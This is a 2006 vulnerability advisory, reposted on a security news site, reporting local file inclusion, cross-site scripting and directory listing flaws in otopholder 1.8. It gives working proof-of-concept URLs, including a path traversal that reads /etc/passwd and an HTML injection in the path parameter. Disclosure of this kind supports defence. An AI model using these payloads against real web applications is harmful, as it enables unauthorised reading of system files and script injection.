Computer Security

Security Advisory: otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] [scip_Advisory 2456] Horde Framework and Horde IMP /index.php cross site referencing

  [Full-disclosure] [scip_Advisory 2457] Horde Framework and Horde IMP /horde/imp/search.
php cross site scripting

  local file include in PHP-Nuke (autohtml.
php)

  Koobi Pro CMS 5.6 SQL injection & XSS

From:vampire_chiristof_(at)_yahoo.com <vampire_chiristof_(at)_yahoo.com>
Date:16.08.2006
Subject:otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln

vendor:
http://www.jakeo.com

vuln :
http://[host]/foto/index.php?path=../../etc/passwd

http://[host]/foto/index.php?path=<b>xss</b>

http://[host]/foto/index.php?path=../../[directory listing]


Author : Vampire

Vampire_chiristof@yahoo.com

Homepage : Www.HackerZ.iR

Www.H4ckerZ.Com

Iran HackerZ Security Team
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru